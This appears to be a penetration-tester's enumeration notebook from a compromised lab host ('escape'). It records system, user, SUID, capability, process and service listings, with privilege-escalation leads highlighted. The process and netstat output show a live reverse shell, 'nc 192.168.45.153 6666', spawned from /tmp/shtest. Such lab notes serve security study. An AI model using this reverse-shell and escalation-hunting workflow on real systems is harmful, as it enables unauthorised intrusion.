System/Kernel


Debian-snmp@escape:/$ uname -a ; cat /etc/*release
Linux escape 4.15.0-124-generic #127-Ubuntu SMP Fri Nov 6 10:54:43 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.5 LTS"
NAME="Ubuntu"
VERSION="18.04.5 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.5 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic
  • 4.15.0-124-generic
  • x86_64
  • Ubuntu 18.04.5 LTS (Bionic Beaver)

Networks


Debian-snmp@escape:/$ ip route ; arp -a
default via 192.168.122.254 dev ens192 proto static 
172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1 
192.168.122.0/24 dev ens192 proto kernel scope link src 192.168.122.113 
? (172.17.0.2) at 02:42:ac:11:00:02 [ether] on docker0
_gateway (192.168.122.254) at 00:50:56:9e:8d:f2 [ether] on ens192
Debian-snmp@escape:/$ netstat -antup4
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:38829         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0    301 192.168.122.113:53096   192.168.45.153:6666     ESTABLISHED 6543/nc             
udp     3840      0 0.0.0.0:161             0.0.0.0:*                           6540/sh             
udp        0      0 0.0.0.0:50067           0.0.0.0:*                           6540/sh             
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   

127.0.0.1:38829

Users & Groups


Debian-snmp@escape:/$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
Debian-snmp:x:111:115::/var/lib/snmp:/bin/false
tom:x:1000:1000::/home/tom:/bin/sh
total 12K
4.0K drwxr-xr-x  2 tom  tom  4.0K Dec  9  2020 tom
4.0K drwxr-xr-x  3 root root 4.0K Dec  9  2020 .
4.0K drwxr-xr-x 23 root root 4.0K Dec  9  2020 ..

tom

Debian-snmp@escape:/$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)
uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=106(uuidd) gid=110(uuidd) groups=110(uuidd)
uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=108(landscape) gid=112(landscape) groups=112(landscape)
uid=109(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=110(pollinate) gid=1(daemon) groups=1(daemon)
uid=111(Debian-snmp) gid=115(Debian-snmp) groups=115(Debian-snmp)
uid=1000(tom) gid=1000(tom) groups=1000(tom)

SUIDs


Debian-snmp@escape:/$ find / -perm -04000 -ls -type f 2>/dev/null
   267552    100 -rwsr-xr-x   1 root     root       100760 Nov 22  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
   262636     12 -rwsr-xr-x   1 root     root        10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
   792448    112 -rwsr-xr-x   1 root     root       113528 Nov 19  2020 /usr/lib/snapd/snap-confine
   266445    428 -rwsr-xr-x   1 root     root       436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
   262569     44 -rwsr-xr--   1 root     messagebus    42992 Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   265209     16 -rwsr-xr-x   1 root     root          14328 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
   277605     40 -rwsr-xr-x   1 root     root          37136 Mar 22  2019 /usr/bin/newuidmap
   265285     60 -rwsr-xr-x   1 root     root          59640 Mar 22  2019 /usr/bin/passwd
   265282     44 -rwsr-xr-x   1 root     root          44528 Mar 22  2019 /usr/bin/chsh
   263817     40 -rwsr-xr-x   1 root     root          40344 Mar 22  2019 /usr/bin/newgrp
   265284     76 -rwsr-xr-x   1 root     root          75824 Mar 22  2019 /usr/bin/gpasswd
   277604     40 -rwsr-xr-x   1 root     root          37136 Mar 22  2019 /usr/bin/newgidmap
   265207     24 -rwsr-xr-x   1 root     root          22520 Mar 27  2019 /usr/bin/pkexec
   265430     20 -rwsr-xr-x   1 root     root          18448 Jun 28  2019 /usr/bin/traceroute6.iputils
   291414     20 -rwsrwxr-x   1 tom      tom           17440 Dec  9  2020 /usr/bin/logconsole
   265350    148 -rwsr-xr-x   1 root     root         149080 Sep 23  2020 /usr/bin/sudo
   277119     52 -rwsr-sr-x   1 daemon   daemon        51464 Feb 20  2018 /usr/bin/at
   265281     76 -rwsr-xr-x   1 root     root          76496 Mar 22  2019 /usr/bin/chfn
   275555     32 -rwsr-xr-x   1 root     root          30800 Aug 11  2016 /bin/fusermount
   266192     28 -rwsr-xr-x   1 root     root          26696 Sep 16  2020 /bin/umount
   266190     44 -rwsr-xr-x   1 root     root          43088 Sep 16  2020 /bin/mount
   265155     64 -rwsr-xr-x   1 root     root          64424 Jun 28  2019 /bin/ping
   262177     44 -rwsr-xr-x   1 root     root          44664 Mar 22  2019 /bin/su
  • 265209 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
  • 265207 24 -rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
  • 291414 20 -rwsrwxr-x 1 tom tom 17440 Dec 9 2020 /usr/bin/logconsole

SGIDs


Debian-snmp@escape:/$ find / -type f -perm -02000 -ls 2>/dev/null
   409436     12 -rwxr-sr-x   1 root     utmp        10232 Mar 11  2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
   276916     44 -rwxr-sr-x   1 root     mlocate     43088 Mar  1  2018 /usr/bin/mlocate
   266374    356 -rwxr-sr-x   1 root     ssh        362640 Mar  4  2019 /usr/bin/ssh-agent
   275510     16 -rwxr-sr-x   1 root     tty         14328 Jan 17  2018 /usr/bin/bsd-write
   265280     72 -rwxr-sr-x   1 root     shadow      71816 Mar 22  2019 /usr/bin/chage
   262311     40 -rwxr-sr-x   1 root     crontab     39352 Nov 16  2017 /usr/bin/crontab
   265283     24 -rwxr-sr-x   1 root     shadow      22808 Mar 22  2019 /usr/bin/expiry
   263772     32 -rwxr-sr-x   1 root     tty         30800 Sep 16  2020 /usr/bin/wall
   277119     52 -rwsr-sr-x   1 daemon   daemon      51464 Feb 20  2018 /usr/bin/at
   524296     36 -rwxr-sr-x   1 root     shadow      34816 Jul 21  2020 /sbin/pam_extrausers_chkpwd
   524315     36 -rwxr-sr-x   1 root     shadow      34816 Jul 21  2020 /sbin/unix_chkpwd

Capabilities


Debian-snmp@escape:/var/tmp$ getcap -r / 2>/dev/null
/usr/bin/mtr-packet = cap_net_raw+ep
/opt/cert/openssl =ep

/opt/cert/openssl =ep

Processes


Debian-snmp@escape:/$ ps -auxwww
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.8 159672  8916 ?        Ss   06:34   0:02 /sbin/init
root       502  0.0 14.2 326076 143964 ?       S<s  06:34   0:12 /lib/systemd/systemd-journald
root       518  0.0  0.6  48416  6900 ?        Ss   06:34   0:03 /lib/systemd/systemd-udevd
root       528  0.0  0.1  97716  1712 ?        Ss   06:34   0:00 /sbin/lvmetad -f
systemd+   691  0.0  0.3 141964  3208 ?        Ssl  06:34   0:00 /lib/systemd/systemd-timesyncd
systemd+   694  0.0  0.5  70672  5124 ?        Ss   06:34   0:00 /lib/systemd/systemd-resolved
root       702  0.0  0.9  91164  9280 ?        Ss   06:34   0:00 /usr/bin/VGAuthService
root       703  0.0  0.7 227020  7140 ?        S<sl 06:34   0:08 /usr/bin/vmtoolsd
root       715  0.0  0.2 531040  2316 ?        Ssl  06:34   0:00 /usr/bin/lxcfs /var/lib/lxcfs/
message+   717  0.0  0.4  50176  4484 ?        Ss   06:34   0:06 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root       785  0.0  1.5 170400 15832 ?        Ssl  06:35   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root       787  0.0  0.6 287552  6472 ?        Ssl  06:35   0:00 /usr/lib/accountsservice/accounts-daemon
root       788  0.0  0.5  62168  5700 ?        Ss   06:35   0:00 /lib/systemd/systemd-logind
daemon     789  0.0  0.2  28340  2288 ?        Ss   06:35   0:00 /usr/sbin/atd -f
syslog     790  0.0  0.4 263044  4628 ?        Ssl  06:35   0:03 /usr/sbin/rsyslogd -n
root       802  0.0  0.2  31328  2808 ?        Ss   06:35   0:00 /usr/sbin/cron -f
Debian-+   804  0.0  0.8  65956  8780 ?        Ss   06:35   0:08 /usr/sbin/snmpd -Lsd -Lf /dev/null -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f
root       826  0.0  3.6 674684 37304 ?        Ssl  06:35   0:02 /usr/bin/containerd
root       837  0.0  1.7 187128 18148 ?        Ssl  06:35   0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root       876  0.0  0.6 288888  6260 ?        Ssl  06:35   0:03 /usr/lib/policykit-1/polkitd --no-debug
root      1176  0.0  7.9 839836 80524 ?        Ssl  06:36   0:10 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root      1189  0.0  0.6  72308  6192 ?        Ss   06:36   0:02 /usr/sbin/sshd -D
root      1236  0.0  0.1  16188  1780 tty1     Ss+  06:36   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root      1290  0.0  1.5 329200 15148 ?        Ss   06:36   0:00 /usr/sbin/apache2 -k start
root      1535  0.0  0.3 478540  3040 ?        Sl   06:37   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 8080 -container-ip 172.17.0.2 -container-port 80
root      1542  0.0  0.5   9364  5336 ?        Sl   06:37   0:08 containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root      1559  0.0  1.8  82892 18888 ?        Ss   06:37   0:00 apache2 -DFOREGROUND
www-data  1668  0.0  1.0  83224 10504 ?        S    06:37   0:00 apache2 -DFOREGROUND
systemd+  2130  0.0  0.3  72028  3772 ?        Ss   07:15   0:00 /lib/systemd/systemd-networkd
www-data  2426  0.0  0.9  83208  9868 ?        S    07:27   0:00 apache2 -DFOREGROUND
www-data  2434  0.0  0.9  83208  9836 ?        S    07:27   0:00 apache2 -DFOREGROUND
www-data  2437  0.0  0.9  83208  9848 ?        S    07:28   0:00 apache2 -DFOREGROUND
www-data  2490  0.0  0.9  83028  9156 ?        S    07:28   0:00 apache2 -DFOREGROUND
www-data  2500  0.0  0.9  83208 10044 ?        S    07:29   0:00 apache2 -DFOREGROUND
www-data  2502  0.1  1.0  83208 10524 ?        S    07:29   0:20 apache2 -DFOREGROUND
www-data  2504  0.0  0.7  82964  7356 ?        S    07:30   0:00 apache2 -DFOREGROUND
www-data  2505  0.0  0.9  83208  9968 ?        S    07:30   0:00 apache2 -DFOREGROUND
www-data  2510 86.8  1.0  83400 10656 ?        R    07:30 229:13 apache2 -DFOREGROUND
www-data  2546  0.0  0.7 333656  7792 ?        S    07:31   0:00 /usr/sbin/apache2 -k start
www-data  2553  0.0  0.7 333656  7792 ?        S    07:31   0:00 /usr/sbin/apache2 -k start
www-data  2557  0.0  0.7 333656  7792 ?        S    07:31   0:00 /usr/sbin/apache2 -k start
www-data  2558  0.0  0.7 333656  7792 ?        S    07:31   0:00 /usr/sbin/apache2 -k start
www-data  2560  0.0  0.7 333656  7792 ?        S    07:31   0:00 /usr/sbin/apache2 -k start
www-data  2565  0.0  0.8 333656  8732 ?        S    07:31   0:00 /usr/sbin/apache2 -k start
www-data  2568  0.0  0.7 333656  7792 ?        S    07:31   0:00 /usr/sbin/apache2 -k start
www-data  2573  0.0  0.7 333656  7792 ?        S    07:31   0:00 /usr/sbin/apache2 -k start
www-data  2574  0.0  0.7 333656  7792 ?        S    07:31   0:00 /usr/sbin/apache2 -k start
www-data  2579  0.0  0.7 333656  7792 ?        S    07:31   0:00 /usr/sbin/apache2 -k start
www-data  2688  0.0  0.0   2388   712 ?        S    08:02   0:00 sh -c bash
www-data  2689  0.0  0.2   3736  2888 ?        S    08:02   0:00 bash
www-data  2696  0.0  0.1   2592  1804 ?        S    08:03   0:00 script /dev/null -c bash
www-data  2697  0.0  0.0   2388   708 pts/0    Ss   08:03   0:00 sh -c bash
www-data  2698  0.0  0.3   3976  3232 pts/0    S+   08:03   0:00 bash
Debian-+  6540  0.0  0.0   4636   820 ?        S    11:42   0:00 sh -c /bin/sh /tmp/shtest
Debian-+  6541  0.0  0.0   4636   864 ?        S    11:42   0:00 /bin/sh /tmp/shtest
Debian-+  6543  0.0  0.2  15720  2184 ?        S    11:42   0:00 nc 192.168.45.153 6666
Debian-+  6544  0.0  0.0   4636   828 ?        S    11:42   0:00 /bin/sh
Debian-+  6549  0.0  0.2  22252  2536 ?        S    11:50   0:00 script /dev/null -c bash
Debian-+  6550  0.0  0.0   4636   872 pts/0    Ss   11:50   0:00 sh -c bash
Debian-+  6551  0.0  0.3  21480  3688 pts/0    S    11:50   0:00 bash
Debian-+  6647  0.0  0.3  39672  3484 pts/0    R+   11:54   0:00 ps -auxwww
  • root 802 0.0 0.2 31328 2808 ? Ss 06:35 0:00 /usr/sbin/cron -f
  • root 826 0.0 3.6 674684 37304 ? Ssl 06:35 0:02 /usr/bin/containerd
  • root 876 0.0 0.6 288888 6260 ? Ssl 06:35 0:03 /usr/lib/policykit-1/polkitd --no-debug
  • root 1176 0.0 7.9 839836 80524 ? Ssl 06:36 0:10 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
  • root 1535 0.0 0.3 478540 3040 ? Sl 06:37 0:00 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 8080 -container-ip 172.17.0.2 -container-port 80
  • root 1542 0.0 0.5 9364 5336 ? Sl 06:37 0:08 containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc

Cron & Systemd


Debian-snmp@escape:/$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for Debian-snmp
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
 
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
 
# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
NEXT                         LEFT          LAST                         PASSED  
Thu 2025-03-06 12:09:00 EST  12min left    Thu 2025-03-06 11:39:06 EST  17min ag
Thu 2025-03-06 14:44:13 EST  2h 47min left Thu 2025-03-06 07:15:41 EST  4h 40min
Fri 2025-03-07 02:54:17 EST  14h left      Thu 2025-03-06 07:15:41 EST  4h 40min
Fri 2025-03-07 06:17:40 EST  18h left      Thu 2025-03-06 07:15:41 EST  4h 40min
Fri 2025-03-07 06:49:55 EST  18h left      Sat 2025-03-01 04:59:05 EST  5 days a
Mon 2025-03-10 00:00:00 EDT  3 days left   Thu 2025-03-06 07:15:41 EST  4h 40min
 
6 timers listed.
Pass --all to see loaded but inactive timers, too.
lines 1-10/10 (END)  

Services


Debian-snmp@escape:/$ systemctl list-units --state=running
UNIT                            LOAD   ACTIVE SUB     DESCRIPTION              
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable Fil
init.scope                      loaded active running System and Service Manager
accounts-daemon.service         loaded active running Accounts Service         
apache2.service                 loaded active running The Apache HTTP Server   
atd.service                     loaded active running Deferred execution schedul
containerd.service              loaded active running containerd container runti
cron.service                    loaded active running Regular background program
dbus.service                    loaded active running D-Bus System Message Bus 
docker.service                  loaded active running Docker Application Contain
getty@tty1.service              loaded active running Getty on tty1            
lvm2-lvmetad.service            loaded active running LVM2 metadata daemon     
lxcfs.service                   loaded active running FUSE filesystem for LXC  
networkd-dispatcher.service     loaded active running Dispatcher daemon for syst
open-vm-tools.service           loaded active running Service for virtual machin
polkit.service                  loaded active running Authorization Manager    
rsyslog.service                 loaded active running System Logging Service   
snmpd.service                   loaded active running Simple Network Management 
ssh.service                     loaded active running OpenBSD Secure Shell serve
systemd-journald.service        loaded active running Journal Service          
systemd-logind.service          loaded active running Login Service            
systemd-networkd.service        loaded active running Network Service          
systemd-resolved.service        loaded active running Network Name Resolution  
systemd-timesyncd.service       loaded active running Network Time Synchronizati
systemd-udevd.service           loaded active running udev Kernel Device Manager
unattended-upgrades.service     loaded active running Unattended Upgrades Shutdo
vgauth.service                  loaded active running Authentication service for
dbus.socket                     loaded active running D-Bus System Message Bus S
docker.socket                   loaded active running Docker Socket for the API
lvm2-lvmetad.socket             loaded active running LVM2 metadata daemon socke
syslog.socket                   loaded active running Syslog Socket            
systemd-journald-audit.socket   loaded active running Journal Audit Socket     
systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log)
systemd-journald.socket         loaded active running Journal Socket           
systemd-udevd-control.socket    loaded active running udev Control Socket      
systemd-udevd-kernel.socket     loaded active running udev Kernel Socket       
 
LOAD   = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB    = The low-level unit activation state, values depend on unit type.
 
35 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.
lines 21-43/43 (END)   

Sudo Version


Debian-snmp@escape:/$ sudo --version
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2

Sudo version 1.8.21p2

Glibc Version


Debian-snmp@escape:/$ ldd --version
ldd (Ubuntu GLIBC 2.27-3ubuntu1.3) 2.27
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

ldd (Ubuntu GLIBC 2.27-3ubuntu1.3) 2.27